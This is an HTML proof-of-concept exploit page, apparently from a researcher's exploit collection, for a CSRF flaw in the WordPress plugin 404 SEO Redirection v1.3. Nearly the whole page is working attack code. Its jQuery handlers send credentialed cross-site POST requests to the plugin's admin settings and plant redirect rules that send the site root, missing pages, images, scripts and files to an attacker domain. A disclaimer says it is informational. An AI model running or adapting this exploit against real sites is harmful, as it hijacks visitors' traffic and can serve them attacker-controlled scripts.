<!DOCTYPE html>
<!--
	 __ __ ___ ____ ____ 
	|  |  |   |__  |  __|
	| | | | / |  __|  __|
	|_|_|_|___|____|____|
-->
<html lang="en">
	<head>
		<meta charset="utf-8">
		<meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no">
		<meta http-equiv="X-UA-Compatible" content="IE=edge">
		<title>m0ze@blackcore:~# 404 SEO Redirection v1.3 CSRF PoC</title>
		<meta name="description" content="404 SEO Redirection v1.3 CSRF PoC">
		<meta name="keywords" content="404 SEO Redirection, CSRF, PoC, exploit">
		<meta name="author" content="m0ze">
		<script src="https://code.jquery.com/jquery-3.6.0.min.js" integrity="sha256-/xUj+3OJU5yExlq6GSYGSHk7tPXikynS7ogEvDej/m4=" crossorigin="anonymous"></script>
		<style type="text/css">
			<!--
			body {background: #000000; color: #e61d4c; padding: 20px; margin: 0; font-family: Verdana, sans-serif;}
			form {margin: 0; padding: 20px;}
			h1 {font-family: Verdana, sans-serif; font-size: 20px; line-height: 1em; border-bottom: 2px #e61d4c solid; padding-bottom: 8px;}
			::-moz-selection {color: #000000; background: #e61d4c;}
			::selection {color: #000000; background: #e61d4c;}
			*:focus {outline: none;}
			a, a:hover, a:visited, a:active {text-decoration: none; color: #e61d4c;}
			input {min-width: 280px; margin: 10px 20px 4px 0px; padding: 12px; background: #000000; border: 1px #e61d4c solid; color: #e61d4c; font-weight: bold; font-family: Verdana, sans-serif; opacity: 1; transition: 0.4s;}
			input[type="button"] {margin: 0px 20px 0px 0px; padding: 12px 54px; background: #000000; border: 1px #e61d4c solid; cursor: pointer; color: #e61d4c; font-weight: bold; font-family: Verdana, sans-serif; opacity: 1; transition: 0.4s; text-transform: uppercase;}
			input[type="button"]:hover {background: #e61d4c; border: 1px #e61d4c solid; color: #000000;}
			.checkboxblock {display: inline-block; vertical-align: middle; font-size: 14px; margin-right: 20px;}
			.custom-checkbox {position: absolute; z-index: -1; opacity: 0;}
			.custom-checkbox+label {display: inline-flex; align-items: center; user-select: none; text-transform: uppercase;}
			.custom-checkbox+label::before {content: ''; display: inline-block; width: 1em; height: 1em; flex-shrink: 0; flex-grow: 0; border: 1px solid #e61d4c; margin-right: 0.5em; background-repeat: no-repeat; background-position: center center; background-size: 50% 50%;}
			.custom-checkbox:checked+label::before {border-color: #e61d4c; background-color: #e61d4c; background-image: url("data:image/svg+xml,%3csvg xmlns='http://www.w3.org/2000/svg' viewBox='0 0 8 8'%3e%3cpath fill='%23000000' d='M6.564.75l-3.59 3.612-1.538-1.55L0 4.26 2.974 7.25 8 2.193z'/%3e%3c/svg%3e");}
			.custom-checkbox:not(:disabled):not(:checked)+label:hover::before {border-color: #e61d4c;}
			.custom-checkbox:not(:disabled):active+label::before {background-color: #e61d4c; border-color: #e61d4c;}
			.custom-checkbox:focus:not(:checked)+label::before {border-color: #e61d4c;}
			.custom-checkbox:disabled+label::before {background-color: #e61d4c;}
			-->
		</style>
	</head>
	<body>
		<h1>### -- [ CSRF | 404 SEO Redirection v1.3 ]</h1>
		<h2>Info:</h2>
		<p>✖ Proof of concept is provided for informational purposes only.</p>
		<p>✖ Successful exploitation requires <b>administrator</b> privileges.</p>
		<p>✖ Injected payload will trigger an alert message with the text «Injected!».</p>
		<p>✖ Tested on WordPress v5.7 + 404 SEO Redirection <a href="https://wordpress.org/plugins/404-redirection-manager/" target="_blank">⭷</a> plugin v1.3 [2021-03-29]</p>
		<br>
		<h2>Settings:</h2>
		<h3>Target URL*:</h3>
		* Only <b>domain name</b> needed!<br>
		<input id="target" name="target" value="https://target.com">
		<br>	
		<br>
		<br>
		<h3>404 Rules Injection:</h3>
		Add New Rule (Redirect From -> Redirect To):<br>
		<input id="redirect_from" type="text" name="redirect_from" value="/">
		<input id="redirect_to" type="text" name="redirect_to" value="https://m0ze.ru">
		<input id="404ruleinjection" type="button" value="Inject">
		<br>
		<br>
		<br>
		<h3>General 404 Rules:</h3>
		<h4>Unknown 404 Web Pages:</h4>
		Redirect all 404 web pages with no rule described to the following destination:<br>
		<input id="redirect_pages_to" type="text" name="redirect_pages_to" value="https://m0ze.ru">
		<div class="checkboxblock">
			<input type="checkbox" class="custom-checkbox" id="pages_status" name="pages_status">
			<label for="pages_status">On / Off</label>
		</div>
		<input id="unknown404pages" type="button" value="Inject">
		<br>
		<br>
		<br>
		<h4>Unknown 404 images:</h4>
		Redirect all 404 images with no rule described to the following destination:<br>
		<input id="redirect_images_to" type="text" name="redirect_images_to" value="https://m0ze.ru/image.png">
		<div class="checkboxblock">
			<input type="checkbox" class="custom-checkbox" id="images_status" name="images_status">
			<label for="images_status">On / Off</label>
		</div>
		<input id="unknown404images" type="button" value="Inject">
		<br>
		<br>
		<br>
		<h4>Unknown 404 JS/CSS files:</h4>
		Redirect all 404 JS/CSS files with no rule described to the following destination:<br>
		<input id="redirect_scripts_to" type="text" name="redirect_scripts_to" value="https://m0ze.ru">
		<div class="checkboxblock">
			<input type="checkbox" class="custom-checkbox" id="scripts_status" name="scripts_status">
			<label for="scripts_status">On / Off</label>
		</div>
		<input id="unknown404jscss" type="button" value="Inject">
		<br>
		<br>
		<br>
		<h4>Unknown other 404 files:</h4>
		Redirect all other 404 files with no rule described to the following destination:<br>
		<input id="redirect_otherfiles_to" type="text" name="redirect_otherfiles_to" value="https://m0ze.ru">
		<div class="checkboxblock">
			<input type="checkbox" class="custom-checkbox" id="otherfiles_status" name="otherfiles_status">
			<label for="otherfiles_status">On / Off</label>
		</div>
		<input id="unknown404other" type="button" value="Inject">
		<br>
		<br>
		<br>
		<script>
			$("#404ruleinjection").click(function(e){
				var url = $("#target").val().replace(/\/$/, "") + "/wp-admin/options-general.php?page=404-redirection-manager.php&404_manager_tab=404_rules";
				var rfrom = $("#redirect_from").val();
				var rto = $("#redirect_to").val();
				xhr = new XMLHttpRequest();
				xhr.open("POST", url, true);
				xhr.withCredentials = "true";
				xhr.setRequestHeader("Content-Type", "application/x-www-form-urlencoded");
				var body = "enabled=1&redirect_from_type=Folder&redirect_from="+rfrom+"&redirect_to="+rto+"&redirect_type=301&save=&add=1";
				xhr.send(body);
				xhr.onreadystatechange = function() {if(xhr.readyState == 4 && xhr.status == 200) {alert("Injected!");}}
			});
			
			$("#unknown404pages").click(function(e){
				var url = $("#target").val().replace(/\/$/, "") + "/wp-admin/options-general.php?page=404-redirection-manager.php&404_manager_tab=general_rules";
				var rpagesto = $("#redirect_pages_to").val();
				var pscheckbox = "";
				if ( document.getElementById( "pages_status" ).checked ) {pscheckbox = "pages_status=on&";}
				xhr = new XMLHttpRequest();
				xhr.open("POST", url, true);
				xhr.withCredentials = "true";
				xhr.setRequestHeader("Content-Type", "application/x-www-form-urlencoded");
				var body = pscheckbox+"redirect_pages_to="+rpagesto+"&pages_save=pages_save";
				xhr.send(body);
				xhr.onreadystatechange = function() {if(xhr.readyState == 4 && xhr.status == 200) {alert("Injected!");}}
			});
			
			$("#unknown404images").click(function(e){
				var url = $("#target").val().replace(/\/$/, "") + "/wp-admin/options-general.php?page=404-redirection-manager.php&404_manager_tab=general_rules";
				var rimagesto = $("#redirect_images_to").val();
				var uicheckbox = "";
				if ( document.getElementById( "images_status" ).checked ) {uicheckbox = "images_status=on&";}
				xhr = new XMLHttpRequest();
				xhr.open("POST", url, true);
				xhr.withCredentials = "true";
				xhr.setRequestHeader("Content-Type", "application/x-www-form-urlencoded");
				var body = uicheckbox+"redirect_images_to="+rimagesto+"&images_save=images_save";
				xhr.send(body);
				xhr.onreadystatechange = function() {if(xhr.readyState == 4 && xhr.status == 200) {alert("Injected!");}}
			});
			
			$("#unknown404jscss").click(function(e){
				var url = $("#target").val().replace(/\/$/, "") + "/wp-admin/options-general.php?page=404-redirection-manager.php&404_manager_tab=general_rules";
				var rjscssto = $("#redirect_scripts_to").val();
				var ujcheckbox = "";
				if ( document.getElementById( "scripts_status" ).checked ) {ujcheckbox = "scripts_status=on&";}
				xhr = new XMLHttpRequest();
				xhr.open("POST", url, true);
				xhr.withCredentials = "true";
				xhr.setRequestHeader("Content-Type", "application/x-www-form-urlencoded");
				var body = ujcheckbox+"redirect_scripts_to="+rjscssto+"&scripts_save=scripts_save";
				xhr.send(body);
				xhr.onreadystatechange = function() {if(xhr.readyState == 4 && xhr.status == 200) {alert("Injected!");}}
			});
			
			$("#unknown404other").click(function(e){
				var url = $("#target").val().replace(/\/$/, "") + "/wp-admin/options-general.php?page=404-redirection-manager.php&404_manager_tab=general_rules";
				var rotherto = $("#redirect_otherfiles_to").val();
				var uocheckbox = "";
				if ( document.getElementById( "otherfiles_status" ).checked ) {uocheckbox = "otherfiles_status=on&";}
				xhr = new XMLHttpRequest();
				xhr.open("POST", url, true);
				xhr.withCredentials = "true";
				xhr.setRequestHeader("Content-Type", "application/x-www-form-urlencoded");
				var body = uocheckbox+"redirect_otherfiles_to="+rotherto+"&otherfiles_save=otherfiles_save";
				xhr.send(body);
				xhr.onreadystatechange = function() {if(xhr.readyState == 4 && xhr.status == 200) {alert("Injected!");}}
			});
		</script>
		<script>
		console.log(`%c
 ╔═══════════════════════════════════════════════════════════════════════════╗ 
 ║                                                                           ║ 
 ║    ███╗   ███╗ ██████╗ ███████╗███████╗    > System update available      ║ 
 ║    ████╗ ████║██╔═████╗╚══███╔╝██╔════╝    > Update: Y/N                  ║ 
 ║    ██╔████╔██║██║██╔██║  ███╔╝ █████╗      > Updating, please wait...     ║ 
 ║    ██║╚██╔╝██║████╔╝██║ ███╔╝  ██╔══╝      > System update successful!    ║ 
 ║    ██║ ╚═╝ ██║╚██████╔╝███████╗███████╗                                   ║ 
 ║    ╚═╝     ╚═╝ ╚═════╝ ╚══════╝╚══════╝    > No problem, right?           ║ 
 ║                                                                           ║ 
 ╚═══════════════════════════════════════════════════════════════════════════╝ `,"color:#e61d4c; background:#000000; font-family: monospace");
		</script>
	</body>
</html>
